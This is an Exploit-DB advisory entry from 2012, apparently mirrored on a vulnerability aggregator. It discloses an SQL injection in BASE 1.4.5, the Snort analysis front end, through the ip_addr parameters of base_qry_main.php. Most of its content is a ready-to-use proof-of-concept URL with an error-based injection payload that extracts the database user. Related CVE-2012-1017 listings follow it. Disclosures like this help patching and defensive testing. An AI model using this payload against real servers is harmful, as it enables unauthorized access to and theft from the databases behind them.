Lucene search
A.kadir altanEDB-ID:18465HistoryFeb 06, 2012 - 12:00 a.m.
BASE 1.4.5 - 'base_qry_main.php?t_view' SQL Injection
2012-02-0600:00:00
a.kadir altan
www.exploit-db.com
16
AI Score
7.4
Confidence
Low
# Exploit Title: BASE 1.4.5 SQL Injection Vulnerability
# Date: 30/01/2012
# Author: a.kadir altan (testpenter_AT_gmail.com)
# Software Link: http://base.secureideas.net
# Version: 1.4.5
# Platform: PHP
##########################
BASE Snort Analysis Front-end SQLi Vulnerability
Vulnerable parameters:
ip_addr[0][1]
ip_addr[0][2]
ip_addr[0][9]
Vulnerable URL:
http://server/base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DBยคt_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20<SQLi HERE>
PoC:
http://server/base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DBยคt_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20)%20AND%20(SELECT%208543%20FROM(SELECT%20COUNT(*),CONCAT(0x3a796d723a,(MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,50)),0x3a6479783a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(5635=5635
Play with ip_addr[x][y], including removal.
##########################Related
openvas
openvas
BASE 'base_qry_main.php' SQLi Vulnerability
2012-02-10 00:00:00
BASE 'base_qry_main.php' SQL Injection Vulnerability
2012-02-10 00:00:00
cve
cve
CVE-2012-1017
2012-02-08 00:55:01
ubuntucve
ubuntucve
CVE-2012-1017
2012-02-08 00:00:00
prion
prion
Sql injection
2012-02-08 00:55:00
cvelist
cvelist
CVE-2012-1017
2012-02-08 00:00:00
nvd
nvd
CVE-2012-1017
2012-02-08 00:55:01